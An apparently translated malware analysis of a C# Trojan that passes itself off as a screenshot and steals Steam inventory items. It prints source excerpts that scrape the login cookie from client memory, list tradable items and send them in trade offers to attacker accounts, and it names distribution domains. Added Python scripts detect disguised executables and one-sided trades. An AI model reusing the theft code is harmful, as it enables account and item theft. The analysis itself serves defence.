
Trojan Stealing Steam Items



Although this Trojan has been known for a long time, it became truly widespread only at the end of November.
What makes it interesting is that instead of the usual theft of usernames and passwords, which is easy to defend against, it steals items directly from your Steam inventory.

Valve has long been aware of the problem but has taken no particular action for several months, even though the current wave could easily be stopped by minor changes to the Steam client.

The Steam inventory stores items from several popular Valve games, some of which can cost a very impressive (by the standards of coloured pixels) amount. It also stores items related to Steam itself (gift copies of games, profile backgrounds, emoticons, etc.).

Infection


Infection happens as follows. The unsuspecting user receives a message containing a link to a supposed screenshot of an inventory, together with an offer to trade items. Clicking the link starts an .scr file whose icon looks like an image thumbnail. Given that Windows hides file extensions by default, and that even when they are shown .scr may well be read as "screenshot", everything looks very plausible.



When the file is launched, the Trojan unpacks a picture from its resources and opens it (the picture really is a screenshot of an inventory or of some item). Some of the variants also register themselves in autostart.



In parallel, the Trojan retrieves cookies from the memory of the Steam client, makes a request to steamcommunity.com to obtain the session identifier, searches the inventory for suitable items and sends them via a trade offer to accounts the attackers prepared in advance.
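The whole infection chain hinges on an .scr executable dressed up as an image. As an added triage example (not code from the original article), the script below classifies downloaded files by comparing their name with their first bytes, so that a PE file named like a screenshot, or a double-extension name such as "inventory.png.scr", is flagged; the sample files it creates are constructed placeholders, not real malware.

```python
import os
import tempfile

# Added triage helper, not part of the original article. Windows hides known
# extensions by default, so "inventory.png.scr" is displayed as "inventory.png",
# and .scr (screensaver) files are ordinary PE executables that run on double-click.
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")
EXECUTABLE_EXTS = (".exe", ".scr", ".com", ".pif")


def classify_download(name: str, head: bytes) -> str:
    """Verdict for one file from its name and its first bytes."""
    stem, ext = os.path.splitext(name.lower())
    inner_ext = os.path.splitext(stem)[1]      # ".png" in "inventory.png.scr"
    is_pe = head[:2] == b"MZ"                  # DOS/PE header magic
    if is_pe and ext not in EXECUTABLE_EXTS:
        return "pe-with-non-executable-extension"   # e.g. a real EXE named "shot.png"
    if ext == ".scr" or (ext in EXECUTABLE_EXTS and inner_ext in IMAGE_EXTS):
        return "screensaver-or-double-extension"    # the disguise used by this Trojan
    if ext in EXECUTABLE_EXTS or is_pe:
        return "executable"
    return "clean"


def scan_dir(path: str) -> list:
    """Return [(name, verdict)] for every non-clean regular file in `path`."""
    findings = []
    for entry in sorted(os.scandir(path), key=lambda e: e.name):
        if not entry.is_file():
            continue
        with open(entry.path, "rb") as fh:
            head = fh.read(2)
        verdict = classify_download(entry.name, head)
        if verdict != "clean":
            findings.append((entry.name, verdict))
    return findings


if __name__ == "__main__":
    # Constructed sample files (not real malware): a fake "screenshot" and a real image.
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "inventory.png.scr"), "wb") as f:
            f.write(b"MZ\x90\x00" + b"\x00" * 60)
        with open(os.path.join(tmp, "inventory.png"), "wb") as f:
            f.write(b"\x89PNG\r\n\x1a\n")
        for name, verdict in scan_dir(tmp):
            print(f"{name}: {verdict}")
```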

By the way, while writing this article I found another version of the Trojan (obviously based on public sources) that was written somewhat differently and had additional functions, for example sending messages to everyone on the friends list.

By the way, the original name of the built file was "Maksim Steam Offer.exe", as Reflector kindly told me, and the profile identifier the stolen items go to is 76561198009197365. The domain from which the Trojan was distributed (and is still being distributed at the time of writing) is "puush-me.com" (for those who decide to play detective: do it from inside a virtual machine). And yes, it is not obfuscated.

Several domains that I managed to collect:

take-screen.org
fastscreen.org
my-screenshot.net
puush-me.com
picturesfast.net
screen-url.com

Remarkably, most of them are registered with Russian registrars.

Digging into the source code


The Trojan itself is written in C#, which is quite unusual for this kind of software. The source I downloaded from the Internet consisted of several files: WinApis.cs, containing several methods for working with WinAPI; Http.cs, containing methods that emulate requests from the Steam client (down to the last header); and Program.cs, where all the action takes place.

Interestingly, the total amount of code is only about 500 lines.

Both variants of the Trojan obtain the cookies from the client's memory as follows:

// Looks for the login cookie value in the client's memory: a 17-digit SteamID64 (7656119...),
// a URL-encoded "||" (%7c%7c) and a 40-character hex token
MatchCollection matchs = new Regex("7656119[0-9]{10}%7c%7c[A-F0-9]{40}", RegexOptions.IgnoreCase).Matches(preparedIDs);

Then, using the cookies obtained, a request is sent to steamcommunity.com to get the session identifier, for which there is a separate (and rather large) method in Http.cs.

Having obtained the identifier, the Trojan uses the steamcommunity API to get the contents of the inventory:

private static List<string[]> GetItems(string steamID, string appID)
{
    List<string[]> items = new List<string[]>();
    while (true)
    {
        // Public inventory endpoint of steamcommunity.com for the given app, context 2
        string link = "profiles/" + steamID + "/inventory/json/" + appID + "/2/";
        string json = Http.SteamWebRequest(cookiesContainer, link, null, "");
        try
        {
            JObject inventory = JObject.Parse(json);
            if (((inventory.SelectToken("success") != null) && ((bool)inventory.SelectToken("success")))
                && (inventory.SelectToken("rgDescriptions")).First != null)
            {
                // rgDescriptions holds per-classid metadata, rgInventory the item instances
                IJEnumerable<JToken> descriptionsBase = inventory.SelectToken("rgDescriptions").Values();
                foreach (JToken eachItem in inventory.SelectToken("rgInventory").Values())
                {
                    JToken infoAbout = descriptionsBase.Where(each => each["classid"].ToString() == eachItem["classid"].ToString()).First();
                    // Only tradable items are kept
                    if (infoAbout["tradable"].ToString() == "1")
                    {
                        string[] item = new string[] { appID, eachItem["amount"].ToString(), eachItem["id"].ToString(), infoAbout["market_name"].ToString(), infoAbout["type"].ToString().ToLower() };
                        // Contains() compares array references here, so this never actually drops duplicates
                        if (!items.Contains(item)) { items.Add(item); }
                    }
                }
            }
            break;
        }
        catch { return null; }
    }
    return items;
}

Filters it according to the specified criteria:

listed = FilterByRarity(listed, "common,");

private static List<string[]> FilterByRarity(List<string[]> input, string filter)
{
    // filter is a comma-separated list of words to match against the item's type field
    string[] filters = filter.Split(',');
    List<string[]> output = new List<string[]>();
    for (int i = 0; i < input.Count; i++)
    {
        for (int x = 0; x < filters.Length; x++)
        {
            // input[i][4] is the lower-cased item type collected by GetItems
            string[] types = input[i][4].Split(' ');
            for (int c = 0; c < types.Length; c++)
            {
                if (types[c] == filters[x] && !output.Contains(input[i]))
                {
                    output.Add(input[i]);
                    break;
                }
            }
        }
    }
    return output;
}

And the suitable items (often quite expensive) are sent to the accounts prepared in advance:

private static string sentItems(string sessionID, string items, string[] Offer)
{
    // Offer[0] is the recipient used in the POST body; Offer[1] and Offer[2] are the partner id
    // and access token taken from the recipient's trade URL.
    // json_tradeoffer decodes to:
    // {"newversion":true,"version":2,"me":{"assets":[ items ],"currency":[],"ready":false},
    //  "them":{"assets":[],"currency":[],"ready":false}}  -- the victim gives, the recipient gives nothing
    return Http.SteamWebRequest(cookiesContainer,
        "tradeoffer/new/send",
        "sessionid=" + sessionID
            + "&partner=" + Offer[0]
            + "&tradeoffermessage="
            + "&json_tradeoffer=%7B%22newversion%22%3Atrue%2C%22version%22%3A2%2C%22me%22%3A%7B%22assets%22%3A%5B"
            + items
            + "%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%2C%22them%22%3A%7B%22assets%22%3A%5B%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%7D"
            + "&trade_offer_create_params=%7B%22trade_offer_access_token%22%3A%22" + Offer[2] + "%22%7D",
        "tradeoffer/new/?partner=" + Offer[1] + "&token=" + Offer[2]);   // the trade offer page URL
}
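The request above is one-sided (assets only under "me", nothing under "them") and carries a trade access token. As an added analysis example, not from the article or the Trojan, the parser below decodes a captured body of that shape and flags such offers, which is the kind of check a proxy or host log review could apply. The sample body is constructed, every identifier in it is a placeholder, and the asset object fields (appid, contextid, amount, assetid) are assumed because the article does not show how `items` is built.

```python
import json
from urllib.parse import parse_qs

# Constructed request body in the shape of the Trojan's tradeoffer/new/send POST.
# Every identifier is a placeholder; the asset object fields are assumed.
SAMPLE_BODY = (
    "sessionid=SESSION_PLACEHOLDER&partner=PARTNER_PLACEHOLDER&tradeoffermessage="
    "&json_tradeoffer=%7B%22newversion%22%3Atrue%2C%22version%22%3A2%2C%22me%22%3A%7B"
    "%22assets%22%3A%5B"
    "%7B%22appid%22%3A570%2C%22contextid%22%3A%222%22%2C%22amount%22%3A1%2C%22assetid%22%3A%22ASSET_A%22%7D"
    "%2C%7B%22appid%22%3A570%2C%22contextid%22%3A%222%22%2C%22amount%22%3A1%2C%22assetid%22%3A%22ASSET_B%22%7D"
    "%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%2C%22them%22%3A%7B%22assets%22"
    "%3A%5B%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%7D"
    "&trade_offer_create_params=%7B%22trade_offer_access_token%22%3A%22TOKEN_PLACEHOLDER%22%7D"
)


def analyse_trade_offer(body: str) -> dict:
    """Decode a tradeoffer/new/send body and summarise who gives what."""
    fields = parse_qs(body, keep_blank_values=True)      # percent-decodes each value
    offer = json.loads(fields["json_tradeoffer"][0])
    params = json.loads(fields.get("trade_offer_create_params", ["{}"])[0])
    given = offer.get("me", {}).get("assets", [])
    received = offer.get("them", {}).get("assets", [])
    return {
        "partner": fields.get("partner", [""])[0],
        "given": len(given),
        "received": len(received),
        "given_assetids": [a.get("assetid") for a in given],
        # A token is used when the recipient is not a friend and was reached via a trade URL
        "uses_access_token": bool(params.get("trade_offer_access_token")),
        # Items leave the account with nothing coming back: the Trojan's pattern
        "one_sided": bool(given) and not received,
    }


def is_suspicious(summary: dict) -> bool:
    """Heuristic: a one-sided offer sent to a tokened (non-friend) recipient."""
    return summary["one_sided"] and summary["uses_access_token"]


if __name__ == "__main__":
    result = analyse_trade_offer(SAMPLE_BODY)
    print(json.dumps(result, indent=2))
    print("suspicious:", is_suspicious(result))
```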

Precautions: use Linux; do not open links sent by strangers; and use antivirus software (it detects this Trojan perfectly well).

Source: https://habr.com/ru/post/246175/
